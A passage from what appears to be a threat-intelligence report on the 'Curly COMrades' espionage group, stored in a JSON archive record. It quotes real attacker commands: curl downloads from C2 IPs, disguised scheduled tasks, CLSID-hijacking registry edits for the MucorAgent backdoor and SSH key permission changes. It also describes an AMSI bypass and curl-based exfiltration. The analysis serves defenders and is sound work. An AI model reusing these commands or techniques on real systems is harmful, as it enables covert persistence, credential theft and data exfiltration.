{
	"id": "79bb4567-2b72-4294-9ef5-8c52ad420722",
	"created_at": "2026-04-06T00:17:30.306932Z",
	"updated_at": "2026-04-10T03:36:00.764905Z",
	"deleted_at": null,
	"sha1_hash": "d6b6a4666e1efbf60c50e0c656e5a0079fba7447",
	"title": "Curly COMrades: A New Threat Actor Targeting Geopolitical Hotbeds",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1178449,
	"plain_text": "Curly COMrades: A New Threat Actor Targeting Geopolitical Hotbeds\r\nBy Victor Vrabie\r\nArchived: 2026-04-05 14:21:26 UTC\r\nThis research from Bitdefender Labs details a cluster of malicious activity we've been tracking since mid-2024. It uncovers a\r\nnew threat actor group we’ve named Curly COMrades, operating to support Russian interests, that's been targeting critical\r\norganizations in countries facing significant geopolitical shifts. We observed them launching focused attacks against judicial\r\nand government bodies in Georgia, as well as an energy distribution company in Moldova. \r\nThe group's primary objective is to maintain long-term access to target networks and steal valid credentials. This allows\r\nthem to move around the network, collect data, and send it out. They repeatedly attempted to extract the NTDS database\r\nfrom domain controllers, the primary repository for user password hashes and authentication data in a Windows network.\r\nAdditionally, they attempted to dump LSASS memory from specific systems to recover active user credentials, potentially\r\nplain-text passwords, from machines where users were logged on. \r\n\"Curly COMrades\" heavily rely on establishing strong access points. They use proxy tools like Resocks, SSH, and Stunnel\r\nto establish multiple entry points into internal networks. Through these established proxy relays, they frequently executed\r\nremote commands, often through tools like Atexec. \r\nFor persistent access, attackers deployed a new backdoor we've named MucorAgent, using a very smart technique: hijacking\r\nCLSIDs to target NGEN (Native Image Generator) for persistence. 
NGEN, a default Windows .NET Framework component\r\nthat pre-compiles assemblies, provides a mechanism for persistence via a disabled scheduled task.\r\nThis task appears inactive, yet the operating system occasionally enables and executes it at unpredictable intervals (such as\r\nduring system idle times or new application deployments), making it a great mechanism for restoring access covertly. Given\r\nthis unpredictability, it is probable that a secondary, more predictable mechanism for executing this specific task also\r\nexisted. \r\nThey also strategically use compromised, but legitimate websites as traffic relays. This tactic complicates detection and\r\nattribution by blending malicious traffic with legitimate network activity. By routing command-and-control (C2) and data\r\nexfiltration through seemingly harmless sites, they bypass defenses that trust known domains and hide their true\r\ninfrastructure. It's very likely that what we've observed is just a small part of a much larger network of compromised web\r\ninfrastructure they control. \r\nThreat Actor Naming \r\nIn our extensive analysis, we looked for strong overlaps with known threat actor groups. While we noted minor similarities,\r\nlike the incidental use of rar.exe for archiving or the System.Management.Automation namespace for PowerShell code\r\nexecution, these are common tactics shared by many actors. Ultimately, we found insufficient evidence to confidently\r\nattribute this campaign to any existing group. To avoid misleading the community with low-confidence attribution, we chose\r\nto designate them as a new, distinct threat actor: ‘Curly COMrades’. \r\nOur decision to name this threat actor \"Curly COMrades\" is rooted in two primary factors: their operational methodologies\r\nand a broader industry concern. 
\r\nTheir technical indicators heavily feature the use of curl.exe for C2 communications and data exfiltration, and a significant\r\naspect of their tooling involves the hijacking of Component Object Model (COM) objects. Beyond these technical aspects,\r\nthe group's operations align with the geopolitical goals of the Russian Federation. \r\nThe second, and perhaps more contentious, aspect of 'Curly COMrades' is its deliberately derogatory nature. We recognize\r\nthat the cybersecurity industry has a long-standing trend of assigning cool, fancy, or even mythological names to threat\r\nactors. While memorable, we—and many others in the cybersecurity community—believe this inadvertently glorifies and, at\r\ntimes, even markets malicious actors. \r\nBy choosing a name like 'Curly COMrades,' we aim to de-glamorize cybercrime, stripping away any perception of\r\nsophistication or mystique. They are not 'fancy bears' or 'wizard spiders'; they are simply malicious actors engaged in\r\ndisruptive and harmful behavior. \r\nWe hope this choice sparks a wider conversation within the cybersecurity community about naming conventions,\r\nencouraging a shift towards more practical and less sensational designations. \r\nTechnical Analysis \r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds\r\nPage 1 of 18\n\nSuspicious activity was first detected in late 2024 with an attempt to deploy a resocks client. This triggered an investigation,\r\nwhich ultimately uncovered a wider espionage campaign. Forensic analysis of the affected systems revealed additional\r\ncompromised machines and credentials, highlighting the attackers' extensive efforts to maintain persistent access. \r\nThe attackers installed reverse proxy agents across multiple systems and leveraged stolen credentials to access, collect,\r\narchive, and exfiltrate internal data. 
They repeatedly attempted to extract the NTDS database from domain controllers and\r\ndump LSASS memory on select systems to maintain their access.  \r\nAfter several resocks tunnels were taken down, the attackers tried to reestablish access by deploying a SOCKS5 server on an\r\ninternet-facing host as an alternative entry point. They then attempted to set up new tunnels between the victim network and\r\ntheir infrastructure using tools like ssh.exe and stunnel. Their persistent efforts to regain access underscore a common tactic\r\nof advanced threat actors: establishing multiple routes for persistence. \r\nRemote commands were executed through reverse proxy relays using the stolen credentials—likely via atexec from the\r\nImpacket toolkit or a similar tool. The attackers' focus was on harvesting credentials and browser data. During this period, a\r\npreviously unseen three-stage malware component—MucorAgent—was identified within their toolkit. This malware was\r\ndesigned to maintain persistence, execute PowerShell scripts, and exfiltrate output via curl.exe. \r\nAnother important tactic observed in this campaign is strategic use of compromised, legitimate websites as traffic relays, a\r\ntactic that significantly complicates detection and attribution. This approach allows them to blend malicious traffic with\r\nnormal network activity, making it harder for security tools to flag their communications. By routing C2 and data exfiltration\r\nthrough seemingly benign sites, they evade defenses that trust known domains and obscure their true infrastructure. \r\nThe sections below outline the observed threat actor activity as identified through forensic analysis and investigation. \r\nProxy Relays \r\nProxy tools were a core component of these intrusions. When combined with valid privileged credentials, they gave the\r\nattackers unrestricted access and control over the affected networks. 
\r\nResocks \r\nThe most frequently observed proxy was resocks, a readily accessible proxy tool from GitHub. Resocks essentially turns a\r\ncompromised computer into a secure relay point, allowing attackers to route their traffic through that internal system as if\r\nthey were directly on the network. The code samples recovered from the compromised systems had been built using garble,\r\nan obfuscation utility designed for Go binaries. Garble works by scrambling and encrypting parts of the program's code,\r\nmaking it harder for security analysts to reverse-engineer it and understand how the tool functions. \r\nResocks acts as a relay point into a compromised network. In this case, Network A represents an attacker, and Network B\r\nrepresents a victim. Source: resocks GitHub readme. \r\nHere's an example of a resocks deployment: the attackers first manually retrieved the client binary using curl. They then\r\ninitiated the resocks tunnel to establish their C2 connection, and finally created a scheduled task to maintain this access\r\npersistently. 
\r\nResocks – Deployment Commands \r\n\"cmd.exe\" /C curl.exe -k http://96.30.124[.]103:443/DRM -o c:\\\\programdata\\\\Microsoft\\\\DRM\\\\Server\\\\DRM.exe \u003e\r\nC:\\\\Windows\\\\Temp\\\\khTFMqZA.tmp 2\u003e\u00261 \r\nc:\\\\programdata\\\\Microsoft\\\\DRM\\\\Server\\\\DRM.exe 96.30.124[.]103:443 --key \u003credacted\u003e \r\n\"cmd.exe\" /C schtasks /create /TN \\\\Microsoft\\\\Windows\\\\UpdateOrchestrator\\\\Check_AC /RU System /SC daily /ST\r\n10:42 /TR \"c:\\\\programdata\\\\Microsoft\\\\DRM\\\\Server\\\\DRM.exe 96.30.124[.]103:443 --key \u003credacted\u003e\" /f \u003e\r\nC:\\\\Windows\\\\Temp\\\\tDkDCEDd.tmp 2\u003e\u00261 \r\nAs usual, the choice of paths, scheduled task names, and service names clearly indicates an attempt to blend in with\r\nlegitimate system files and processes. For persistence, the attackers consistently created scheduled tasks and Windows\r\nservices. 
\r\nResocks - Binaries \r\nc:\\programdata\\drm.exe\r\nc:\\programdata\\microsoft\\drm\\server\\drm.exe \r\nc:\\programdata\\oracle\\java.oracle_jre_usage\\java.exe \r\nc:\\programdata\\oracle\\java\\java.exe \r\nc:\\programdata\\rs.exe \r\nc:\\programdata\\vmware\\vmware tools\\vmtools.exe \r\nResocks - Scheduled Tasks \r\n\\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceProtectionUSB \r\n\\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceToolsUSB \r\n\\Microsoft\\Java\\JavaUpdate \r\n\\Microsoft\\Windows\\UpdateOrchestrator\\Check_AC \r\ntt1 \r\ntest1 \r\nResocks - Windows Services \r\nMsEdgeSvc \r\nJavaSvc \r\nOracleJavaSvc \r\nAnalysis of commands found within the scheduled tasks and service definitions revealed that, in most cases, the resocks\r\nclients were configured to communicate over port 443. One instance involving port 8443 was also identified. \r\nResocks - C2 Servers \r\n91.107.174[.]190 \r\n96.30.124[.]103 \r\n194.87.31[.]171 \r\n75.127.13[.]136 \r\n94.131.109[.]91 \r\n207.180.194[.]109 \r\nAvailable evidence indicates that a significant portion of the remote command execution was channeled through their\r\nestablished SOCKS tunnels. Alongside general remote commands, we also observed attempts to execute DCSync. This\r\nattack technique exploits legitimate Active Directory replication functions to trick a Domain Controller into replicating\r\nsensitive information (including user password hashes) to the attacker's machine, demonstrating the Curly COMrades'\r\nappetite for credentials and further lateral movement. \r\nIn one instance, the resocks client located in Moldova initiated an HTTP request to a Redmine server over port 3000 in\r\nUkraine. Redmine is a legitimate, open-source web-based project management application, widely used by businesses, that\r\nuses port 3000 by default. 
This behavior strongly indicates that the Redmine server in Ukraine was likely compromised by\r\nthe attackers and then repurposed, potentially allowing the attackers to circumvent geolocation-based access restrictions. \r\nSOCKS5 Binary \r\nAnother proxy tool, believed to have been deployed alongside the resocks tunnels as an alternative access point on an\r\ninternet-exposed system, was identified as a SOCKS5 server binary, adapted from an open-source project hosted on GitHub.\r\nThis tool binds to 0.0.0.0:55333 (with a later identified sample binding to port 55334; MD5:\r\n44a57a7c388af4d96771ab23e85b7f1e), enabling immediate proxying of network traffic after execution. Before the server\r\nstarts, the application console window is hidden through calls to the AllocConsole(), FindWindowA(), and ShowWindow()\r\nAPIs using the SW_HIDE parameter. \r\nIn total, two distinct samples of this SOCKS server variant were identified across separate compromised hosts. \r\nSOCKS5 Proxy - Binaries \r\nc:\\programdata\\hp.exe \r\nc:\\programdata\\microsoft\\edgeupdate\\msedge.exe \r\nc:\\programdata\\microsoft\\mf\\mf.exe \r\nc:\\programdata\\ssh\\sshelp.exe \r\nc:\\programdata\\symantec\\symantec.exe \r\nPersistence for one instance of this SOCKS5 server was achieved through the scheduled task named\r\n\\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicesUSB. \r\nSSH + Stunnel \r\nThe most recently investigated activity revealed a shift in the technique to establish SOCKS proxy capabilities. Instead of\r\nrelying on custom proxy binaries, ssh.exe was used for remote port forwarding, while tstunnel.exe—a component of the\r\nStunnel suite—was used to encrypt the TCP traffic. This approach was likely intended to obfuscate the SSH\r\ncommunication and evade network-based detection mechanisms. 
\r\nFirst, the tstunnel.exe (MD5: 063770f7e7eb52d83c97aa63c0a6f8a6) was executed with a configuration directing it to bind\r\nto the localhost interface on a high-numbered port, such as 52437. The configuration instructed the tool to encapsulate the\r\nlocal TCP traffic and send it to the remote compromised server, creating an encrypted communication channel.\r\nTstunnel Location  Corresponding Config \r\nC:\\programdata\\Samsung\\Printer\\Printer.exe  C:\\programdata\\Samsung\\Printer\\service.conf \r\nC:\\programdata\\microsoft\\crypto\\rsa\\Certutils.exe  C:\\programdata\\microsoft\\crypto\\rsa\\service.conf \r\nNext, ssh.exe was copied to an unusual location, like C:\\ProgramData\\Microsoft\\UEV\\Templates\\Template.exe. A special\r\nconfiguration file was also put in place. This file was set up to enable remote port forwarding, allowing ssh.exe to\r\ncommunicate with the SSH server through a local port opened by tstunnel.exe. File permissions were then adjusted to make\r\nsure ssh.exe could run successfully.\r\nicacls C:\\programdata\\Microsoft\\UEV\\templates\\SettingsLocationTemplate2013B.xsd /remove *S-1-15-2-1 *S-1-15-2-2 \r\nicacls C:\\programdata\\Microsoft\\UEV\\templates\\SettingsLocationTemplate2013B.xsd /remove *S-1-5-11 *S-1-5-32-544 *S-1-5-32-545 \r\nicacls C:\\programdata\\Microsoft\\UEV\\templates\\SettingsLocationTemplate2013B.xsd /inheritance:d \r\nThe binary was then launched with the -F option to load the custom configuration, followed by parameters that activated the\r\nremote forwarding functionality. \r\n\"C:\\programdata\\Microsoft\\UEV\\templates\\Template.exe\" -F\r\nC:\\programdata\\Microsoft\\UEV\\templates\\SettingsLocationTemplate2013C.xsd start \r\nIn a separate attempt to configure SSH traffic forwarding, the use of a custom configuration file was avoided. Instead, a\r\ndefault configuration file was placed for the SYSTEM user. 
File permissions required for this setup were adjusted through\r\nthe execution of a batch script located at C:\\ProgramData\\ch_prm.bat: \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\id_rsa /c /t/Inheritance:d\r\nTakeOwn /F c:\\windows\\system32\\config\\systemprofile\\.ssh\\id_rsa\r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\id_rsa /c /t /Remove:g \"Authenticated Users\"\r\nBUILTIN\\Administrators BUILTIN Everyone Users \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\id_rsa \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\config /c /t /Inheritance:d \r\nTakeOwn /F c:\\windows\\system32\\config\\systemprofile\\.ssh\\config \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\config /c /t /Remove:g \"Authenticated Users\"\r\nBUILTIN\\Administrators BUILTIN Everyone Users \r\nicacls.exe c:\\windows\\system32\\config\\systemprofile\\.ssh\\config \r\nNext, the ssh.exe binary was copied to C:\\Program Files (x86)\\Google\\chrome.exe and executed using a configuration\r\nprofile “Update” that was likely predefined in the default config. 
The selection of the destination path, executable name, and\r\nprofile designation appears to have been deliberately made to blend seamlessly with legitimate system behavior.\r\n\"cmd.exe\" /C copy /y c:\\\\windows\\\\system32\\\\OpenSSH\\\\ssh.exe \"c:\\\\program files (x86)\\\\Google\\\\chrome.exe\" \u003e\r\nc:\\\\Programdata\\\\WindowsUpdateTask_B.tmp 2\u003e\u00261 \r\n\"c:\\\\program files (x86)\\\\Google\\\\chrome.exe\" Update -N \r\nc:\\\\Program Files (x86)\\\\Google\\\\GoogleUpdate.exe\" \r\nCurlCat \r\nAn interesting artifact associated with this execution—presumably intended to support traffic forwarding—was the\r\nspawning of a secondary process, C:\\Program Files (x86)\\Google\\GoogleUpdate.exe (MD5:\r\ndd253f7403644cfa09d8e42a7120180d), by the ssh.exe binary. Analysis of GoogleUpdate.exe revealed that it obtained\r\nhandles to the standard input and output streams and facilitated bidirectional data transfer between these streams and the C2\r\nserver over HTTPS. The binary effectively behaves in a manner similar to netcat and is likely used in conjunction with the\r\nSSH ProxyCommand option to relay traffic through the specified intermediary. \r\nThe tool is assessed to be a custom implementation, with several relevant details identified through static analysis. It is\r\nstatically linked with the libcurl library, which is used to establish communication with a hardcoded compromised site\r\n\u003credacted\u003e[.]ge—likely hosted on a PHP and WordPress stack. 
HTTP requests issued by the tool contain hardcoded\r\nheaders, indicating a predefined communication pattern with the C2 infrastructure: \r\nHost: \u003credacted\u003e.ge \r\nAccept: */* \r\nAccept-Encoding: gzip, deflate \r\nConnection: keep-alive \r\nContent-type: application/octet-stream \r\nCookie: PHPSESSID=\u003crandom base64 encoded string\u003e \r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0\r\nSafari/537.36 \r\nAn important part of the tool's setup involves creating a custom character substitution map. This map is derived from the\r\nfollowing string. \r\nH2IWw5/AOhBJ6zQmxreqlVFYgfckCEnbABCDEFGHIJKLMNOPQRSTUVWXYZabcdefKDPL8t0N9T3UMRo1XajZ7Gp+ydvSisu4ghijklmnopqrs\r\nThis 128-character string is then divided into four 32-character segments. From these segments, two distinct 64-character\r\nstrings are constructed through concatenation: \r\nThe substitution alphabet is created by joining characters 0-31 and characters 64-95 \r\nResult: H2IWw5/AOhBJ6zQmxreqlVFYgfckCEnbKDPL8t0N9T3UMRo1XajZ7Gp+ydvSisu4 \r\nThe standard Base64 alphabet is created by joining characters 32-63 and characters 96-127 \r\nResult: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ \r\nThese two 64-character strings are then used to establish a one-to-one character mapping. This means each character from\r\nthe Standard Base64 Alphabet (the second string) is replaced by the character found at the exact corresponding position in\r\nthe Substitution Alphabet (the first string). For example, if the tool needs to encode a character that would normally be 'A' in\r\nstandard Base64 (the first character of the standard alphabet), it would instead use 'H' (the first character of the custom\r\nsubstitution alphabet). This effectively scrambles or \"encodes\" the data using a custom alphabet, making it harder for\r\ngeneric decoders to interpret. 
\r\nThe tool retrieves content from standard input using PeekNamedPipe() and ReadFile(), then encodes it. The encoded data is\r\nsent via an HTTPS request, and the server's response is decoded using the same logic before being written to standard output\r\nvia the WriteFile() API. \r\nAnother sample discovered at the same location (C:\\Program Files (x86)\\Google\\GoogleUpdate.exe) communicated with the\r\ndomain \u003credacted\u003e[.]md as its C2 server. Its structure and behavior closely resembled the previously mentioned site,\r\nsuggesting it was also configured to operate as an intermediary—likely a compromised web server functioning as a proxy\r\nbetween the victim machine and attacker-controlled infrastructure. \r\nRuRat \r\nAlthough the attackers had already achieved persistence through valid credentials and sustained network access via proxy\r\nrelays, they implemented an additional method for continued access: deploying the legitimate Remote Monitoring and\r\nManagement (RMM) tool, Remote Utilities (RuRat). This was initiated by %COMMON_APPDATA%\\run.bat, which created\r\nRuRat's default installation directory and extracted the tool's contents into it. \r\nRMM – RuRat Deployment \r\nmkdir \"c:\\Program Files (x86)\\Remote Utilities - Host\" \r\n\"c:\\programdata\\rar.exe\" x c:\\programdata\\RemUT.rar \"c:\\Program Files (x86)\\Remote Utilities - Host\" \r\nsc create RemUtSvc binPath= \"\\\"c:\\Program Files (x86)\\Remote Utilities - Host\\rutserv.exe\\\" -run_agent\" start= delayed-auto error= ignore \r\nreg import c:\\programdata\\cfg.reg \r\ndel /f /q c:\\programdata\\cfg.reg \r\nMucorAgent \r\nA complex and previously unknown malware—designated MucorAgent—was identified on multiple systems within one of\r\nthe targeted organizations. 
\r\n It was engineered as a .NET stealthy tool capable of executing an AES-encrypted PowerShell script and uploading the\r\nresulting output to a designated server. Although no PowerShell payloads were recovered, the design of the malware\r\nsuggests that its execution was intended to occur periodically—most likely for the purpose of data collection and\r\nexfiltration. \r\nThe malware consists of three distinct components. The first is a .NET assembly that hijacks a legitimate COM handler\r\nassociated with the CLSID {de434264-8fe9-4c0b-a83b-89ebeebff78e}. This initial component is responsible for loading a\r\nsecond .NET stage dynamically. The second stage proceeds to decrypt and execute the third stage alongside another\r\nassembly responsible for AMSI patching in order to avoid the PowerShell script payload being detected. \r\nThe final payload searches for specific files (index.png or icon.png) within a designated folder, decrypts an embedded\r\nPowerShell script, and executes it using System.Management.Automation namespace without invoking the PowerShell.exe\r\nprocess—thereby reducing visibility. The script’s output is then AES-encrypted and wrapped with a PNG header and footer\r\nto masquerade as a legitimate image file. This disguised output is subsequently exfiltrated to an attacker-controlled server\r\nusing curl.exe. \r\nDeployment \r\nThe typical method used to deploy MucorAgent and establish persistence involves the execution of reg.exe commands to\r\nhijack the CLSID. 
This was done either manually or by placing all the necessary commands into a single batch file,\r\ncommonly named C:\\ProgramData\\r.bat: \r\nMucorAgent – CLSID Hijacking \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /t REG_SZ /d \"C:\\\\Windows\\\\System32\\\\mscoree.dll\" /F \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /v Assembly /t REG_SZ /d \"TaskLauncher, Version=1.0.0.0, Culture=neutral,\r\nPublicKeyToken=null\" /F \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /v Class /t REG_SZ /d \"TaskLauncher.TaskHandler\" /F \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /v CodeBase /t REG_SZ /d \"C:\\\\ProgramData\\\\Intel\\\\Logs\\\\Data\\\\TaskLauncher.dll\" /F \r\nreg add HKEY_USERS\\\u003cSID\u003e\\SOFTWARE\\Classes\\CLSID\\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\\InprocServer32 /v RuntimeVersion /t REG_SZ /d \"v4.0.30319\" /F \r\nThe COM handler {de434264-8fe9-4c0b-a83b-89ebeebff78e} is linked to the scheduled task named “.NET Framework\r\nNGEN v4.0.30319 Critical.” While this task is typically disabled by default, it is periodically enabled. \r\nTo explain, NGEN (Native Image Generator) is a Microsoft .NET tool designed to boost the performance of .NET\r\napplications. It works by pre-compiling an application's intermediate code into native machine code, storing it for faster\r\nloading later and reducing startup times and memory usage. NGEN tasks are usually executed in the background during\r\nsystem idle times or triggered after specific events like the deployment of new .NET applications, updates to the .NET\r\nFramework, or the installation/updates of .NET-reliant applications. 
This periodic enablement ensures that .NET applications\r\nremain optimized over time. \r\nBy hijacking this CLSID, threat actors gain a unique persistence mechanism, allowing them to restore their MucorAgent\r\nbackdoor during one of these periodic NGEN optimization scans. A critical advantage of this method is stealth and\r\nexecution under the highly privileged SYSTEM account. This particular technique, leveraging CLSID hijacking in\r\nconjunction with NGEN, is unprecedented in our observations. \r\nHowever, a notable drawback of this approach is the inherent unpredictability of NGEN task execution times. For this\r\nreason, we believe the attackers likely employed another, more reliable task or trigger in parallel, either to directly execute\r\nMucorAgent or to trigger the NGEN optimization process on-demand. This hypothesis is further supported by another task\r\ncreation command immediately following the reg add commands: \r\nschtasks /create /tn \"\\\\Mozilla\\\\Browser.VisualUpdate\" /xml C:\\\\programdata\\\\Curl.TaskHandler.xml \r\nOne step in the setup process involved delivering the payload intended for execution by MucorAgent. This payload was an\r\nencrypted data blob, disguised as a .png file (though lacking actual image headers). In one observed instance, the attackers\r\nused curl.exe to download this file directly from a compromised website. The file was then placed in the specific location\r\nwhere MucorAgent was configured to find and execute it. \r\ncurl.exe -k http://\u003credacted\u003e[.]org:443/index.png -o c:\\users\\\u003credacted\u003e\\appdata\\roaming\\Microsoft\\Windows\\Templates\\Curl\\index.png\r\nAnother COM handler hijacking was also identified, targeting the CLSID {613fba38-a3df-4ab8-9674-5604984a299a},\r\nwhich corresponds to NGenTaskLauncher.CriticalTaskHandler64. 
\r\nInternals \r\nThe first stage of MucorAgent exposes a class named TaskLauncher, which inherits from TaskHandlerBase, enabling it to be\r\nloaded by taskhostw.exe. The core functionality is implemented within the Start() method, which receives a data parameter,\r\nverifies the presence of the encrypted payload, and proceeds to invoke the second stage if the payload is found. \r\nIf the primary payload is not found, the Launch() function is invoked instead. This function initiates the curl.exe process,\r\nproviding it with the -K image parameter. This parameter instructs curl to use the file “image” (located in the\r\n%APPDATA%\\Microsoft\\Windows\\Templates\\Curl folder) as its configuration file. This action is likely intended to upload\r\nthe results produced by the previous PowerShell script and to retrieve the next PowerShell script for execution. \r\nIf a file with the payload is present, the next step involves loading the second stage. This is accomplished by configuring an\r\nAppDomainSetup and creating an instance of a .NET assembly using CreateInstanceFrom(), specifying the assembly name\r\nTaskLauncher.TaskHandler and the type \"TaskLauncher, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\". This\r\noperation results in the loading of TaskLauncher.dll from %COMMON_APPDATA%\\SOShared\\Logs\\User\\FE8C4219-A639-46F6-AC97-8035FF5A4A85\\Packages\\, and the invocation of the TaskHandler constructor, where the logic for the\r\nsecond stage is implemented. 
\r\nIt’s important to note that the properties Date, Form, Path, and Count are set for the second stage and have the following\r\nmeaning:\r\nDate  Contains the AES-encrypted third stage, along with the assembly responsible for implementing AMSI patch functionality.\r\nForm  The AES key\r\nPath  The directory where the encrypted PowerShell payload is located \r\nCount  The offset delimiting the AMSI patch binary from the third stage \r\nIn other samples analyzed, the Date property is absent, and the third-stage payload is read directly from a file specified by a\r\nhardcoded path within the second stage. The AES key and Count value are extracted and used within the Decode() method\r\nto decrypt the third stage, employing the AesManaged algorithm with both the key and initialization vector (IV) set to the\r\nsame value obtained from the Form property. The decryption process results in a GZip archive containing the AMSI patch\r\nassembly concatenated with the third and final stage.\r\nEach invocation of the Show() method results in the loading and execution of a type from the assembly provided as input. \r\nThe initial invocation of the Show method is intended to execute the AMSI patch assembly. As with other payloads, the core\r\nlogic is implemented within the TaskLauncher.TaskHandler class, where the class constructor calls a static Main() function\r\nresponsible for applying the AMSI bypass. The bypass technique employed is similar to the method described in this\r\nanalysis and involves overwriting the address of the AmsiScanBuffer function within a .NET utility library with a dummy\r\nfunction. 
This modification allows the payload to evade inspection by the Antimalware Scan Interface (AMSI), thereby\r\nbypassing detection mechanisms. \r\nThe third and final stage utilizes the Form and Path properties to retrieve the AES key and the directory containing the\r\nencrypted PowerShell script. As illustrated in the image below, the Show() function is invoked with parameters that include\r\nthis information, along with the index.png file—expected to contain the encrypted script—and the string \"error.jpg\", which\r\ndesignates the output file where the execution results will be written. \r\nThe Show() method reads the encrypted script, decrypts it using the AesManaged algorithm (AES in CBC mode) with both\r\nthe key and initialization vector (IV) set to the same value, and subsequently decompresses the result using GZIP. The\r\nresulting buffer is supplied as input to a PowerShell object instance from the System.Management.Automation namespace.\r\nThe script is executed, and the output is serialized into a byte array, which is then passed to an encoding routine that\r\nperforms GZIP compression followed by AES encryption. \r\nThe SetData() method then processes the encrypted output by appending a PNG header and footer, after which the resulting\r\ndata is written to the designated output file, error.jpg. \r\nAlthough neither the encrypted PowerShell script nor the corresponding output file could be recovered, the design of the\r\nMucorAgent suggests that it was likely intended to function as a backdoor capable of executing payloads on a periodic basis.\r\nEach encrypted payload is deleted after being loaded into memory, and no additional mechanism for regularly delivering\r\nnew payloads was identified. 
Additional payloads may have been retrieved by the same curl.exe instance believed to be\r\nresponsible for uploading the execution results. \r\nTwo potential C2 servers associated with the MucorAgent were identified: \u003credacted\u003e[.]org and 45.43.91[.]10. The first, a\r\ndomain, was observed in a curl command and is assessed to correspond to the manual retrieval of an encrypted PowerShell\r\npayload. The second, an IP address, appeared in a manually executed curl command likely intended to verify connectivity.\r\nThis activity was observed immediately following the execution of the scheduled task believed to initiate the first stage of\r\nthe MucorAgent. \r\nThe locations where the first, second and third stages were deployed during the attacks are provided in the table below: \r\nMucorAgent – Binaries (2nd \u0026 3rd stages) \r\nc:\\programdata\\intel\\logs\\data\\tasklauncher.dll \r\nc:\\programdata\\gretech\\gomplayer\\appconfig \r\nc:\\programdata\\kmsautos\\bin\\driver\\x64wdv\\windivert.conf \r\nc:\\programdata\\driversetuputility\\updater2\\task.conf \r\nc:\\programdata\\usoshared\\logs\\user\\fe8c4219-a639-46f6-ac97-8035ff5a4a85\\packages\\tasklauncher.dll \r\nc:\\programdata\\kmsautos\\bin\\driver\\x64wdv\\win \r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\asp.netwebadminfiles\\appconfig\\appconfig \r\nIn several analyzed samples, the folder designated for locating the encrypted PowerShell payload was configured as\r\nC:\\ProgramData\\canon\\OIPPESP, with the payload file named icon.png in certain instances. \r\nDiscovery \r\nAnalysis of all artefacts revealed the methods by which the attackers gathered general information about the compromised\r\nnetwork and systems. On specific hosts, depending on operational requirements, living-off-the-land binaries (LOLBins)\r\nwere employed. 
A subset of the observed commands is presented below: \r\nDiscovery - LOLBins Commands \r\nnetstat -anob \r\ntasklist /v \r\nsysteminfo \r\nwmic logicaldisk list brief \r\nwmic process get name,commandline,executablepath /format:list \r\narp -a \r\nroute print \r\nipconfig /all \r\nAdditional commands falling under the discovery category were also observed. The command curl ipinfo.io was used to\r\nverify internet connectivity, while netstat -ano -p tcp was executed to identify active proxy tunnels. For network-level\r\ndiscovery of domain controller information, PowerShell cmdlets from the ActiveDirectory module were utilized. \r\nDiscovery - Active Directory Commands \r\npowershell \" Get-ADTrust -Filter *\" \r\npowershell \"get-addomain -identity \u003credacted\u003e\" \r\npowershell \"get-aduser -Filter * -Server \u003credacted\u003e -Properties samaccountname,serviceprincipalnames | ?\r\n{$_.ServicePrincipalNames} | ft\" \r\npowershell \"get-aduser \u003credacted\u003e\" \r\nping \u003cdomain controller\u003e \r\nnet use \u003ccensored\u003e \r\nAvailable evidence suggests that batch files containing multiple commands have been used for discovery. The use of such\r\nscripts was a recurring pattern observed across various phases of the intrusion. The following table lists batch files that are\r\nassessed to have been used for information-gathering purposes; however, this conclusion is based solely on file names, as\r\nthe contents of the files could not be recovered during the investigation: \r\nDiscovery - Scripts \r\nc:\\programdata\\tr.bat \r\nc:\\programdata\\gtad.bat \r\nc:\\programdata\\list_AD.bat \r\nc:\\programdata\\gu.bat \r\nc:\\programdata\\q.bat \r\n Credentials Access \r\nThe techniques employed by the attackers did not exhibit any particular novelty and closely resembled widely recognized\r\nmethods for extracting credentials from domain controllers and Windows systems. 
